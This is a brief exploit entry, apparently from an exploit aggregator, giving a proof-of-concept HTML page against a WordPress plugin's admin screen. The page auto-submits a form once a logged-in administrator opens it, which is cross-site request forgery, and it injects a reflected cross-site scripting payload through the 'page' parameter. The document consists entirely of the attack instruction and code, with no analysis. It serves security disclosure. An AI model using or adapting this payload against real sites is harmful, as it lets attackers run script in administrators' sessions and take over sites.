Share
## https://sploitus.com/exploit?id=WPEX-ID:4992A4A9-F21A-46E2-BABF-954ACFC7C5B4
Make a logged in admin open a page with the code below

<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=GMWQP&view=list" method="POST">
        <input type="text" name="page" value='"><script>alert(/XSS/)</script>'>
        <input type="submit" value="submit">
    </form>
</body>